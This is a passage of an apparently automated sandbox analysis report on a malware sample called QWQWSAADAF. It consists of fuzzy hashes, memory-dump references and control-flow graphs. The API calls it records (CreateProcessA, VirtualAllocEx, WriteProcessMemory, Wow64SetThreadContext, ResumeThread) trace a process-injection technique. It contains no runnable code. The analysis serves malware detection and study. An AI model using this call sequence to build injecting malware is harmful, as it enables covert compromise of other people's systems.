                                                                                                                                                                                                                                                                                        • Instruction ID: 2422c199d6c7c3c2111bd1292cc13ff0c218beb248ebf941f217b8d2c677dc42
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69a528543d22483f8868b67e8078e7bd7a5b5a95908e0e1104ba3dea07670a45
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0751E274D06618CFDB58CFEAD8486EDFBB2BB8A305F20902AD41AB7254DB348945CF05
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 414c0ad2ffbbab74c29096e3ee7cbfb3add0746617f69db9723f7d2b8f5c35c1
                                                                                                                                                                                                                                                                                        • Instruction ID: 97794f77121a53fa3d63283c4a7f00bdbc2c5ffa964699f553c718076bbe0182
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 414c0ad2ffbbab74c29096e3ee7cbfb3add0746617f69db9723f7d2b8f5c35c1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C511971D40269DBDB64CF55D8407EDB7B2EB89310F10C5EAD10AB7250EB309A858F55

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 622 cf7d38-cf7dd1 624 cf7e1a-cf7e42 622->624 625 cf7dd3-cf7dea 622->625 628 cf7e88-cf7ede 624->628 629 cf7e44-cf7e58 624->629 625->624 630 cf7dec-cf7df1 625->630 638 cf7f24-cf8012 CreateProcessA 628->638 639 cf7ee0-cf7ef4 628->639 629->628 640 cf7e5a-cf7e5f 629->640 631 cf7e14-cf7e17 630->631 632 cf7df3-cf7dfd 630->632 631->624 635 cf7dff 632->635 636 cf7e01-cf7e10 632->636 635->636 636->636 637 cf7e12 636->637 637->631 658 cf801b-cf80e0 638->658 659 cf8014-cf801a 638->659 639->638 647 cf7ef6-cf7efb 639->647 641 cf7e82-cf7e85 640->641 642 cf7e61-cf7e6b 640->642 641->628 644 cf7e6f-cf7e7e 642->644 645 cf7e6d 642->645 644->644 648 cf7e80 644->648 645->644 649 cf7f1e-cf7f21 647->649 650 cf7efd-cf7f07 647->650 648->641 649->638 652 cf7f0b-cf7f1a 650->652 653 cf7f09 650->653 652->652 655 cf7f1c 652->655 653->652 655->649 670 cf80fc-cf80fd 658->670 659->658 671 cf80ff-cf8100 670->671 672 cf80d7-cf80e0 670->672 673 cf8102-cf8106 671->673 674 cf8110-cf8114 671->674 672->670 673->674 675 cf8108 673->675 676 cf8116-cf811a 674->676 677 cf8124-cf8128 674->677 675->674 676->677 678 cf811c 676->678 679 cf812a-cf812e 677->679 680 cf8138-cf813c 677->680 678->677 679->680 683 cf8130 679->683 681 cf813e-cf8167 680->681 682 cf8172-cf817d 680->682 681->682 687 cf817e 682->687 683->680 687->687
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CF7FFF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 41a0d9d1644baa146b47d5dbd7218d0c4b0217d92ec1de149bc2bd039f51dcd5
                                                                                                                                                                                                                                                                                        • Instruction ID: 5b2ac8b8e0a0adf50a5c39e56c76fd4f407eae87be633acf560a271e664a67b0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41a0d9d1644baa146b47d5dbd7218d0c4b0217d92ec1de149bc2bd039f51dcd5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6C11370D0021D8FDB64CFA8C841BEDBBB1BB49304F1096AAE959B7240DB749E85CF95

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 556 cf7d37-cf7dd1 558 cf7e1a-cf7e42 556->558 559 cf7dd3-cf7dea 556->559 562 cf7e88-cf7ede 558->562 563 cf7e44-cf7e58 558->563 559->558 564 cf7dec-cf7df1 559->564 572 cf7f24-cf8012 CreateProcessA 562->572 573 cf7ee0-cf7ef4 562->573 563->562 574 cf7e5a-cf7e5f 563->574 565 cf7e14-cf7e17 564->565 566 cf7df3-cf7dfd 564->566 565->558 569 cf7dff 566->569 570 cf7e01-cf7e10 566->570 569->570 570->570 571 cf7e12 570->571 571->565 592 cf801b-cf80e0 572->592 593 cf8014-cf801a 572->593 573->572 581 cf7ef6-cf7efb 573->581 575 cf7e82-cf7e85 574->575 576 cf7e61-cf7e6b 574->576 575->562 578 cf7e6f-cf7e7e 576->578 579 cf7e6d 576->579 578->578 582 cf7e80 578->582 579->578 583 cf7f1e-cf7f21 581->583 584 cf7efd-cf7f07 581->584 582->575 583->572 586 cf7f0b-cf7f1a 584->586 587 cf7f09 584->587 586->586 589 cf7f1c 586->589 587->586 589->583 604 cf80fc-cf80fd 592->604 593->592 605 cf80ff-cf8100 604->605 606 cf80d7-cf80e0 604->606 607 cf8102-cf8106 605->607 608 cf8110-cf8114 605->608 606->604 607->608 609 cf8108 607->609 610 cf8116-cf811a 608->610 611 cf8124-cf8128 608->611 609->608 610->611 612 cf811c 610->612 613 cf812a-cf812e 611->613 614 cf8138-cf813c 611->614 612->611 613->614 617 cf8130 613->617 615 cf813e-cf8167 614->615 616 cf8172-cf817d 614->616 615->616 621 cf817e 616->621 617->614 621->621
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CF7FFF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f38c74b45e25a9c8747f1f45eee45211f3a214de7c50797f30d4ad67a77defae
                                                                                                                                                                                                                                                                                        • Instruction ID: 361b1f080177e485a20e193d362995246823eb470b0ded57e69ddd070abc680f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f38c74b45e25a9c8747f1f45eee45211f3a214de7c50797f30d4ad67a77defae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CC10370D0021D8FDB64CFA8C841BEDBBB1BB49304F1096AAE959B7240DB749E85CF95

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 688 cf79a8-cf7a1b 691 cf7a1d-cf7a2f 688->691 692 cf7a32-cf7a93 WriteProcessMemory 688->692 691->692 694 cf7a9c-cf7aee 692->694 695 cf7a95-cf7a9b 692->695 695->694
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00CF7A83
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5f6717789c0737f65e06d5ec2dc973ffc8526c39271776562b6107b18e7f26fe
                                                                                                                                                                                                                                                                                        • Instruction ID: 76663d7b93369d044af0e8250d1e5d2d9c940f85da056fa0e0cef9bdaf7a741a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f6717789c0737f65e06d5ec2dc973ffc8526c39271776562b6107b18e7f26fe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B141ABB5D052589FCF04CFA9D984AEEBBF1FB49310F24902AE818B7210D779AA45CF54

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 700 cf79b0-cf7a1b 702 cf7a1d-cf7a2f 700->702 703 cf7a32-cf7a93 WriteProcessMemory 700->703 702->703 705 cf7a9c-cf7aee 703->705 706 cf7a95-cf7a9b 703->706 706->705
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00CF7A83
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                        • Opcode ID: af2ef0eeb5550599032864f9bab20130d4a49bf579dbee830b493b859a321a5a
                                                                                                                                                                                                                                                                                        • Instruction ID: bd890993c76b8de8f3b084540987a6196b397b727d74e0e678a44f2b34d79ef2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af2ef0eeb5550599032864f9bab20130d4a49bf579dbee830b493b859a321a5a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F41A9B5D012589FCF00CFA9D980AEEBBF1BB09310F24902AE818B7200D739AA45CB54

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 720 cf7b08-cf7bca ReadProcessMemory 723 cf7bcc-cf7bd2 720->723 724 cf7bd3-cf7c25 720->724 723->724
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00CF7BBA
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8254fd9e945eea9602b74f33fd94d32d19a3994c2b185359d0732bfd5942d4ad
                                                                                                                                                                                                                                                                                        • Instruction ID: 5081859560c54f257278153d254bcb3d07cbc41cfb2786647928f824ba9aa437
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8254fd9e945eea9602b74f33fd94d32d19a3994c2b185359d0732bfd5942d4ad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B541ACB9D04258DFCF10CFA9D980AEEFBB1BB09310F14942AE815B7200D775A945CF68

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 711 cf7b03-cf7bca ReadProcessMemory 714 cf7bcc-cf7bd2 711->714 715 cf7bd3-cf7c25 711->715 714->715
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00CF7BBA
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1ab9425b13c437e994668ba54b88f7a24f4144676117f56834be499ba611a421
                                                                                                                                                                                                                                                                                        • Instruction ID: ea4285b768b77e1d48e5f05f8c3ce8ccdb930a279f815f7cdc5e356658ddccfd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ab9425b13c437e994668ba54b88f7a24f4144676117f56834be499ba611a421
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B641CCB9D04258DFCF14CFA9D980AEEFBB1BB09310F14942AE815B7200D735A945CF68

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 729 cf7889-cf794a VirtualAllocEx 732 cf794c-cf7952 729->732 733 cf7953-cf799d 729->733 732->733
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00CF793A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5be656a08587b00ca5db7aaac5ba56c00f09cb0cc5c098710aed1f2365903695
                                                                                                                                                                                                                                                                                        • Instruction ID: 76533fd3df2528994419e6866c1a046b3a065623831cd0166d1c8313d5fcdc6a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5be656a08587b00ca5db7aaac5ba56c00f09cb0cc5c098710aed1f2365903695
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6831A7B9D05258DFCF14CFA9D880AAEBBB1FB49310F14902AE815B7210D775A945CF58

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 738 cf7890-cf794a VirtualAllocEx 741 cf794c-cf7952 738->741 742 cf7953-cf799d 738->742 741->742
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00CF793A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 14caf5b275bb895d56de2969ac73614990347bfb88c428d929af1d2dba4703b8
                                                                                                                                                                                                                                                                                        • Instruction ID: 496eb754f3cdecbf10ca87825a214b0969c4af5f3969098482ce5297b41b6b50
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14caf5b275bb895d56de2969ac73614990347bfb88c428d929af1d2dba4703b8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8231A6B9D042589FCF10CFA9D880AAEFBB1FB09310F10902AE815B7200D775A902CF58

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 747 cf7760-cf77c8 749 cf77df-cf7827 Wow64SetThreadContext 747->749 750 cf77ca-cf77dc 747->750 752 cf7829-cf782f 749->752 753 cf7830-cf787c 749->753 750->749 752->753
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00CF7817
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2cb463bf7915ada27055b91e21ae3abc0a926855a3dee275a1626339f8ee5f5a
                                                                                                                                                                                                                                                                                        • Instruction ID: 1db778477df6a202b803befea6959bef01129d58bd59f59f13749f06defc1fc5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cb463bf7915ada27055b91e21ae3abc0a926855a3dee275a1626339f8ee5f5a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5041CBB5D01258DFDB14CFAAD884AEEBBF1BF49310F24802AE419B7240D739A945CF54

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 764 cf1bd8-cf1c8f VirtualProtect 766 cf1c98-cf1cd4 764->766 767 cf1c91-cf1c97 764->767 767->766
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 00CF1C7F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 38816bb49c0f460863998e088344ec6d38745d435801b4b3cb15349a41d06b4f
                                                                                                                                                                                                                                                                                        • Instruction ID: 7376bdc2fcd95f72e7ed6a9e3fdd7a20005f8a42b73f57260078eb353cc27a14
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38816bb49c0f460863998e088344ec6d38745d435801b4b3cb15349a41d06b4f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 543198B9D01258DFCB14CFAAD580AEEFBF0AB09310F24902AE814B7310D375A945CF64

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 758 cf1bd7-cf1c8f VirtualProtect 760 cf1c98-cf1cd4 758->760 761 cf1c91-cf1c97 758->761 761->760
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 00CF1C7F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 339f38837005a83bb5a0340f9cd2297be00575139b279505ec4c07683c01f1a5
                                                                                                                                                                                                                                                                                        • Instruction ID: d943d36221c5f5341278bb26d3a7475c9b828f672b466103536db6d1674f0f6e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 339f38837005a83bb5a0340f9cd2297be00575139b279505ec4c07683c01f1a5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA3188B9D05258DFCB14CFA9D580AEEFBF0AB19310F24902AE815B7210D375A945CF64

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 770 cf7768-cf77c8 772 cf77df-cf7827 Wow64SetThreadContext 770->772 773 cf77ca-cf77dc 770->773 775 cf7829-cf782f 772->775 776 cf7830-cf787c 772->776 773->772 775->776
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00CF7817
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d6b2cb7521f6e51e740a2ca14d8eeb484755f133c7eec921470bbbe22eac148c
                                                                                                                                                                                                                                                                                        • Instruction ID: 4b73c044912607cb8e7b37036615d0860baf98b799238d6288eb6c2a7a40e5a4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6b2cb7521f6e51e740a2ca14d8eeb484755f133c7eec921470bbbe22eac148c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0231DBB5D01258DFDB14CFAAD884AEEFBF1BB48310F24802AE418B7240D779A945CF54
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4e9ab81e96bdb2e261cf8babd64656ff2e8231c725cf79c315962890d3153e4e
                                                                                                                                                                                                                                                                                        • Instruction ID: a8228c907b497d12481ac7e712e59e533b8b0920274dda0a80501998b60b8c62
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e9ab81e96bdb2e261cf8babd64656ff2e8231c725cf79c315962890d3153e4e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8131CBB8D052589FCB14CFAAD884AEEFBB4BB49310F14942AE815B7300D775A901CF98

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 781 cf7677-cf7706 ResumeThread 784 cf770f-cf7751 781->784 785 cf7708-cf770e 781->785 785->784
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5b285f1616a3ef6f73c52524ea9b05fb1f3657b434a1f1bf1d7a590187881ac0
                                                                                                                                                                                                                                                                                        • Instruction ID: 15663fadc427fac9badf1e3eb0cb21561b5c04ae95de7a60869ac47bdc5f264b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b285f1616a3ef6f73c52524ea9b05fb1f3657b434a1f1bf1d7a590187881ac0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D831CBB8D052589FCF14CFA9D884AEEFBB0BB49310F24942AE815B7300C775A901CF58
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363446866.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_c9d000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 31204381328e78a0e48fbdc10e95fb9ba02c8af1be575e2c0e477f4cbde3a3de
                                                                                                                                                                                                                                                                                        • Instruction ID: a925efbd0ddb2a616fe3c741a185e5f7cdca087cd8dc865bd1d2e3d3d99de150
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 31204381328e78a0e48fbdc10e95fb9ba02c8af1be575e2c0e477f4cbde3a3de
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E212572504304DFDF14DF10D9C8B16BB65FB98314F24C5A9E90A1B256C33AE856CAA2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363446866.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_c9d000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
